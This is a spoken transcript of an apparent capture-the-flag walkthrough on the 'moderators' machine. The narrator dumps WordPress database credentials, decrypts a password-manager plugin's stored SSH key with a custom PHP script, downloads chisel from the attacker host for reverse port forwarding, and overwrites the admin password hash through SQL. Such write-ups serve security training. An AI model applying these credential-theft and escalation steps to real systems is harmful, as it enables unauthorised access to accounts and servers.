Hey guys, welcome back. So from the previous video, we got Lexi user and we had the SSH key of this user, and then we go back to the directory of WordPress site, which is site.new, and here we have wp-config.php file, which we read successfully now because Lexi user have permissions to read and write and execute. So from this file we got the MySQL credentials, database credentials, which we already pasted here. So now let's go and we will enumerate the database. So I'm going to clear this and make it a big, make it little bit big. Okay, so MySQL space -h, which is going to be localhost, and then space -u for the space -d for the database name. So the database is WordPress and the username is WordPress user and space -p. So we can confirm this first. So this is the database name, this is username, and this is going to be the password. So I'm going to copy it. Okay, just hit enter here, and we need password, so paste that here and hit enter. Now we are in the database and inside WordPress database, but I want to see if there are other databases too. So for that we can say show databases. So there are only two databases. This is the default one, information schema, and this is what we are in. Now I want to say tables. So these are the tables here, WP user and WPMS passwords. This is something related to the password manager plugin. Maybe the passwords are saved here. WPMS category and WP options. So I'm interested in these four. So let's go. First of all, we go to WP users. So select star from WP underscore users. Okay, so these are the users here. I'm going to keep this with me. Paste that. Okay, go back. So there is admin, and this is the hash for the admin user. We need to crack this hash also because we have whole access on this database, so we can also update this or change this password, and we can also log in into the WordPress maybe with this credential. So we will see that in a minute. The next thing we want to see is WPMS password. So I'm going to say describe what? Describe that. So password ID, username, email, and user password. So there are passwords, category ID and node and URL. So this is interesting. Let's see. Select star from WP-PMS passwords. Hit enter. Oh, this is the big one. And here we can see there is user ID 6, username is Carlos account, and this is the email ID of Carlos, and this is the password. And there is SSH key, and SSH key for whom? For John, because we see there are two users. One is Lexi and another one is John. So this is John private ID RSA key, but this is base 64 encoded because that seems base 64. We will see that in a minute. Okay, that's it. These are the things only here. So I'm going to copy this and I'm going to put it in a new file, paste that. Okay. Next was WPMS category. Let's see real quick what's inside that. So select star from category, and there is not much. The last one is WP options, so copy that, select star from WP options and hit enter. Oh, come on. Star from WP options. And this is also again that seems CSS. Okay. This is the theme name 2020. And this is the important part. WPMS PMS encrypted key, encryption key. So I'm going to copy this part, copy, come here, and paste that. Fine. Okay. What else? This is FM key. Any key I'm going to see here, I'm going to copy that because we don't know where we need to put that. Okay, what else? Is there anything interesting? No, I don't think. No. And there is logged in salt, and this is the logged in key. So again, I'm going to copy these two, copy that, come back here, paste that. Okay, and this is logged in key, copy that, paste that here. Okay, so else what? Authentication salt, authentication key, a lot of things there. Non-salt, nonce key. This is, I think, for other plugin. Done. So I'm going to exit from here, ls, and it is in cd wp content / plugins ls, and this is the password manager. So cd password manager clear ls space -la assets. So there are images and CSS, JavaScripts and fonts. Let's see what's inside includes. And inside include there is one file, encryption.php. That seems interesting. Other one is PMS settings action.php or PMS settings.php. But I should go with this first. So clear that and cd include cat encryption.php. There is a class encryption, and inside that class there is a function for decrypting the password, and there is a function to encrypt the password, and that's what I was looking for. Because if there is something which is encrypting the data, so it should have a function to encrypt that, and this is the file from which is responsible for encryption and decryption. So for encryption what it needs, no problem, but for decryption what it needs. So if you want to decrypt, you must have the encrypted string, and the key. So encrypted string, we have this one, we already get that, and for the key we have this key, right? So both of these things we have. Now it needs salt, it needs this, it is going to base64 decode, and from the JSON string it is going to get the ciphertext. So that means if we decode this base64 decode, we will get the ciphertext in the JSON format. Let's go and do this. Come back here, cat John. Here we save the encoded string, right? And make it base64 space -d to decrypt that, and let's see what we get here. So as you can see, this is in the JSON format. This is the first thing. Okay, second thing is, the first part is ciphertext. So this is your ciphertext all up to here. This is the ciphertext. Then we have this 4. Okay, then we have salt also. So whatever we need in to decrypt things, we already have there. Key we already have, right? So there are two ways to get the John user. The first one is to decrypt the encrypted SSH key with this string, and another way we can go and make port forwarding, access the application, log in with the admin password, and we already have the key. So rest of the part will be done by the application itself. You just need to put the key to decrypt the SSH key. So we will see both of these methods, but first of all I'm going to decrypt this. So for that, first of all I'm going to let's copy this, copy, come here, new file, and paste that. So we have this file, save it as encryption.php. okay, and what we can do here, this is very simple. We just need to put what we need. So as you can see, this function needs these two arguments. So to satisfy this function, we must know these two arguments, and we will hard code these arguments, right? So we will actually create another function here. Okay, so let's create that function. Let's decrypt, and okay, inside what we need, the first argument we need is this encryption string. So put here encryption string. Come on, man. This one, copy that, come here, paste that, and the value of this encryption string is going to be, we will see that. Then we need key, right? So key is equal to this one, and then we will put it in a result. So result is going to be dollar this will be go to there, we call decrypt function, okay, which needs these two arguments. This is the first one, copy that, paste it here, comma, dollar key. That's it. We can echo also. So to see the result, echo result, fine, paste that, and here we can say result 2 is equal to new encryption, fine, and echo that, echo dollar result 2, and now call the function, call our function. Let's decrypt. This was our function, right? So that's it. Now what we need to put these values. So the first thing is cipher. So this is going to be your cipher from here all the way up to here. So copy that, come back here and paste it here, fine. The second thing we need is key. So key we have here, just take this value, copy that, come back here, encryption.php, and just paste that, save it, and let's try to execute it with the PHP. So I'm going to clear that PHP and encryption.php. So there is something wrong. Okay, what is wrong? Function decrypt, let's decrypt, then it needs encrypted string, which is, oh sorry, it needs the string, not this cipher, because cipher it will automatically, once this function is executed, it is automatically extract the cipher and salt and everything. Control A, copy, and come to the encryption key and Control Z, just paste that here. Okay, now we need key, so this is the key, copy this key, come here and paste that, save it. Now let's run it again. Yeah, this is the John SSH key up to here. So just copy that, come here, open new tab, come on, open new tab, paste that here, so we need to adjust a bit this file. So wherever you see space, you just need to delete that space and hit enter. This is the new line actually. So I'm going to manage this a bit and come back. So this is the key, we already adjusted everything. Make sure here you don't have any space and everything is set up. So just save that and save it as John _ID _RSA. Save it, come back here, and here we just need to chmod 600 and John _ID _RSA. Okay, now let's try to SSH. And as John user 10.10.11.173, hit enter. Okay, let's do this one more time. And yeah, we logged in. So the problem was there should be after this, once the key is ended, so you must have an enter here. Okay, this is the thing. So that's it. And here we need to just put this value, copy that, come here, paste that, save it, and we don't need that. So now we are John user. Okay, this is the first way you can get the John ID RSA key. One more thing, once I did that machine, okay, I had some errors belong to some errors from the PHP, because at that time whatever the error I faced, I tried to resolve that, and after resolving I can successfully execute this command. Okay, but maybe once you make this encryption key encryption.php file and you try to execute it with PHP, maybe you face the problem. Another thing you can do, what you can do, you can go, you have the shell with the Lexi user, you can send the encryption.php file which you created and send that file to the to anywhere you have access, write access. I sent this to dev shm, and from here I executed the PHP encryption.php. So you can also do like that. Okay, now the third part, how you can get the John SSH key, is you need to do port forwarding. So cd/opt, and from here, okay, cd chisel all, clear that, and let's start the python 3 space -m http.server on port number 80, and come here, wget http ://10.10.14.9, this is my IP, /chisel. Okay, so download the chisel on the target and then make port forwarding for the port number 8080. Okay, so chmod +x chisel, clear that. Now first of all we need to start the chisel server here on my machine, on attacker machine. So how we do that, /chisel server space -p, port number, let's say 9090, and then we need to specify, we need reverse. Okay, so hit OK, server is started listening on 9090, and here what you need is /chisel client, and we need to connect to the attacker machine like this on port number 9090, then capital R for reversing, reverse port forwarding, and make it on 8080 from the local host 8080, right? Hit enter and we should get a hit here, and as you can see session 1 is created, we are connected. Now just go here and you can specify port number 8080. So now we can access the WP side. Now the thing is, as you can see here, it is not rendered in a correct manner. So what you can do, we can make a record in etc host file. So you can do that, you can do that like this, 127.0.0.1, okay, space moderators.htb, okay, and send this to /etc/host file. You can also do this, do the same task typing nano command, nano/etc/host. But if you are going to do like this, make sure you put here double greater than signs. Otherwise, if you put just one greater than sign, it is going to delete rest of all the records from your etc host file. So make sure about this. Okay, now we have entry in the etc host file. Just go here and refresh this page again, and hopefully this time we will get the access. Now the thing here is we need to go and we can do two things. The first one is we already have the admin hash to log in to the application, WordPress application, and the other thing you can do is you can change the password, because on database we have 100% access. So first of all ssh space hyphen I, id RSA, Lexi at 10.10.11.173, login as Lexi, and MySQL space hyphen H, localhost space hyphen D, WordPress space hyphen U, WordPress user space hyphen P. Hit enter, go back here. We already have the password, so this is the password. Copy that, come here, paste this, hit enter. Now we are logged in as WordPress user to the database. Okay, and we have the password for the administrator. So maybe to crack it is going to take too long, so better than that we can do one more thing. There is an application named as WordPress password generator. Go to this app, and from here you can easily just input whatever password you need to insert. So let's say I'm going to say test123. Okay, and generate the hash. So it's generated. The best thing is it's generated the hash, and also it tell you that how you can update the update query syntax of the password. So take this, I'm going to copy that and come here, just paste that. You mention here the username because field is already there, user underscore login. So this is the username, right? And here I just need to mention semicolon, hit enter, and as you can see, row 1, that means we successfully changed the password. Come to this application, and as you can see, this application we can access on port 8080. Now we need to log in, and this is word known that if you want to go to login page in the WordPress, you need to put wp-admin. So we are here. Let's just put the username admin, and the password is test123. Okay, this mail is correct, yes, or you can also choose remind me later. So we are logged in successfully. Now if you see here, there is pwdms. So this is the password manager plugin. And it's opened the page. So now as you can see here, we have two entry as we got in the database. One is Carl and one is SSH for the John. So we need John. Let's click on this view button, and as you can see, we have this key. Fine. So let's go. I'm going to just copy this. Okay, so this is the John SSH key, right? So these are the two approaches with which you can get the John SSH key, and we already get the John user here.